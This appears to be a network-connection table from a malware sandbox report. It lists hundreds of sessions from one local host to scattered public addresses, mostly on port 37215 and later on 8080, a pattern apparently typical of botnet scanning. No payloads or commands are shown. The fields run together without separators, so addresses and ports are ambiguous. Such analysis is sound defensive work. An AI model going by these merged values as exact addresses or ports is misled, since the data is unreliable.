                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31267192.168.2.234404857.49.105.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31268192.168.2.2358328197.90.125.11337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31269192.168.2.2351996197.27.158.20137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31270192.168.2.235860260.6.142.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31271192.168.2.235421458.244.255.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31272192.168.2.2342326157.210.232.14437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31273192.168.2.2348610157.205.224.11437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31274192.168.2.234508465.139.10.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31275192.168.2.234477041.44.3.13537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31276192.168.2.2343722144.157.46.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31277192.168.2.2339282197.214.26.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31278192.168.2.2334246157.204.208.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31279192.168.2.2360502157.49.64.19037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31280192.168.2.2338050157.167.167.237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31281192.168.2.2337306163.249.117.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31282192.168.2.2350780197.77.228.16837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31283192.168.2.2334336157.222.151.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31284192.168.2.2352346197.64.52.5337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31285192.168.2.233869841.41.23.24137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31286192.168.2.2345194157.62.64.12437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31287192.168.2.235078441.72.254.16237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31288192.168.2.235438441.108.49.10237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31289192.168.2.234341441.122.99.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31290192.168.2.2355930157.105.143.8037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31291192.168.2.234829641.19.134.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31292192.168.2.235997441.136.155.11537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31293192.168.2.2359714197.196.164.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31294192.168.2.2343226148.222.121.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31295192.168.2.2334978197.47.118.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31296192.168.2.235033441.87.35.6337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31297192.168.2.2356744157.155.13.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31298192.168.2.234595883.231.120.17037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31299192.168.2.2341264197.91.248.14437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31300192.168.2.2337274197.76.112.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31301192.168.2.234449441.204.205.7837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31302192.168.2.2346628157.17.132.15737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31303192.168.2.2358598157.121.223.5137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31304192.168.2.2346026168.202.247.18837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31305192.168.2.2340238157.1.158.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31306192.168.2.2355194157.127.177.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31307192.168.2.2343382197.94.254.4937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31308192.168.2.234676841.9.135.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31309192.168.2.2358208157.213.101.7437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31310192.168.2.2354682157.119.251.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31311192.168.2.2335868197.111.236.20937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31312192.168.2.2342438157.192.37.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31313192.168.2.2340594197.33.65.13437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31314192.168.2.235093241.163.252.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31315192.168.2.235493241.227.55.19037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31316192.168.2.233374841.31.228.18037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31317192.168.2.2341248157.134.227.19537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31318192.168.2.234768041.97.187.6337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31319192.168.2.2347780198.147.94.24037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31320192.168.2.2358950157.32.42.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31321192.168.2.234934641.44.103.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31322192.168.2.2353606197.202.41.1837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31323192.168.2.2357986197.254.133.5237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31324192.168.2.234436035.26.230.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31325192.168.2.2350808103.185.191.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31326192.168.2.2352894157.144.244.9537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31327192.168.2.2357126157.2.5.4237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31328192.168.2.2350636197.104.40.7837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31329192.168.2.235149041.178.12.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31330192.168.2.233423041.137.85.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31331192.168.2.2359360197.227.84.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31332192.168.2.2344468197.223.79.7237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31333192.168.2.2345448157.116.45.14137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31334192.168.2.235902041.8.188.19037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31335192.168.2.2356368157.78.45.18237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31336192.168.2.235840041.13.90.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31337192.168.2.2342526157.191.186.9737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31338192.168.2.235737041.19.143.237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31339192.168.2.233444041.64.146.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31340192.168.2.23506325.62.31.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31341192.168.2.2349126157.220.93.22137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31342192.168.2.2355514197.73.45.12937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31343192.168.2.2347166197.27.18.5137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31344192.168.2.2348496106.49.165.15937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31345192.168.2.2344828157.221.176.337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31346192.168.2.2332880197.179.3.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31347192.168.2.234518841.209.211.22237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31348192.168.2.2356036197.208.125.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31349192.168.2.235455841.236.174.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31350192.168.2.234946641.155.48.1237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31351192.168.2.2358834197.192.114.4637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31352192.168.2.2333348157.210.73.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31353192.168.2.2348902157.10.77.23837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31354192.168.2.2338990197.234.87.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31355192.168.2.2343672104.255.238.9337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31356192.168.2.2338512194.26.96.19137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31357192.168.2.2333626123.101.172.20737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31358192.168.2.2345510197.191.21.24737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31359192.168.2.235181641.42.89.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31360192.168.2.2357966197.105.79.22037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31361192.168.2.235647841.186.201.1937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31362192.168.2.236082841.59.167.3437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31363192.168.2.234886899.215.62.13537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31364192.168.2.2341660197.149.36.23137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31365192.168.2.235916841.173.54.8037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31366192.168.2.233994641.71.88.23837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31367192.168.2.235860819.149.178.17037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31368192.168.2.234231241.209.125.13737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31369192.168.2.2347466157.3.85.24537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31370192.168.2.2343938197.130.119.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31371192.168.2.234125641.156.83.9737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31372192.168.2.2355750157.98.81.16337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31373192.168.2.234812441.214.244.1737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31374192.168.2.2360262157.195.171.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31375192.168.2.2354830157.13.48.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31376192.168.2.234795041.18.189.9037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31377192.168.2.2334770163.3.134.22237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31378192.168.2.2349950217.39.38.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31379192.168.2.2346346197.107.192.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31380192.168.2.235757470.180.131.14137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31381192.168.2.2339202197.246.247.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31382192.168.2.234570641.203.244.9437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31383192.168.2.2333938157.60.44.9637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31384192.168.2.234638885.90.233.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31385192.168.2.235561298.234.214.10737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31386192.168.2.2339864197.191.206.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31387192.168.2.234657841.200.184.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31388192.168.2.2335816157.254.121.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31389192.168.2.233706240.6.184.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31390192.168.2.2337862197.174.181.10237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31391192.168.2.2355068157.9.132.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31392192.168.2.235634891.199.222.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31393192.168.2.23585621.192.156.5537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31394192.168.2.2344088197.110.179.19137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31395192.168.2.2334906197.15.79.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31396192.168.2.2344132197.111.182.18037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31397192.168.2.2354148157.165.60.13537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31398192.168.2.2345434158.31.222.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31399192.168.2.2336008197.99.104.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31400192.168.2.2357014157.137.3.6237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31401192.168.2.233803041.96.130.18937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31402192.168.2.2338286157.216.110.8037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31403192.168.2.2338944128.54.119.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31404192.168.2.233615241.251.78.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31405192.168.2.2335024197.235.109.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31406192.168.2.2338892159.241.158.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31407192.168.2.233406041.230.167.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31408192.168.2.235263041.92.104.9037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31409192.168.2.2349260157.92.73.10437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31410192.168.2.2336076197.142.168.14137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31411192.168.2.2351780188.237.232.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31412192.168.2.2333468157.220.38.1437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31413192.168.2.234009041.142.86.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31414192.168.2.2355642197.114.53.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31415192.168.2.234148641.221.14.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31416192.168.2.2350294157.108.199.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31417192.168.2.2335306157.23.162.7337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31418192.168.2.234395691.100.86.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31419192.168.2.2358580135.199.40.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31420192.168.2.2357560162.132.65.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31421192.168.2.233687068.246.20.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31422192.168.2.233288094.104.59.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31423192.168.2.233343851.242.178.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31424192.168.2.235819027.86.103.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31425192.168.2.235591046.198.25.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31426192.168.2.2346666212.67.235.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31427192.168.2.2344846117.74.92.1288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31428192.168.2.2347054198.169.126.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31429192.168.2.2336202120.164.222.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31430192.168.2.2343296196.166.167.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31431192.168.2.234682214.214.0.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31432192.168.2.2353610128.205.170.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31433192.168.2.234058297.135.29.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31434192.168.2.234083618.198.16.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31435192.168.2.2360422140.94.196.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31436192.168.2.234203632.197.82.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31437192.168.2.2336554142.55.147.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31438192.168.2.2340142154.118.118.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31439192.168.2.2358392200.113.113.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31440192.168.2.2350010155.130.219.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31441192.168.2.2354732105.33.65.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31442192.168.2.2334014142.55.207.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31443192.168.2.233941018.29.165.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31444192.168.2.2341616130.2.101.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31445192.168.2.2343528189.200.88.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31446192.168.2.2341284141.60.52.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31447192.168.2.2342042140.250.50.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31448192.168.2.235903265.127.112.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31449192.168.2.2336500203.223.132.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31450192.168.2.2352300157.60.140.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31451192.168.2.233880064.117.29.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31452192.168.2.235872069.159.219.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31453192.168.2.2342060160.190.93.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31454192.168.2.233582875.198.3.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31455192.168.2.234239218.157.30.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31456192.168.2.233582043.93.25.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31457192.168.2.2353656131.119.29.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31458192.168.2.23403725.52.211.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31459192.168.2.2352644118.72.69.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31460192.168.2.2355858221.160.255.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31461192.168.2.234689862.0.169.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31462192.168.2.2333420152.154.126.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31463192.168.2.2348504163.94.194.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31464192.168.2.2337020222.215.4.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31465192.168.2.2337544130.187.2.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31466192.168.2.234012497.70.197.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31467192.168.2.2342524106.13.44.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31468192.168.2.234125620.107.122.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31469192.168.2.234003450.46.9.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31470192.168.2.235326853.125.132.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31471192.168.2.235289023.3.23.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31472192.168.2.2337122220.226.96.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31473192.168.2.235203497.102.173.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31474192.168.2.2357738138.144.59.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31475192.168.2.2342494139.97.167.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31476192.168.2.2333452142.67.100.768080
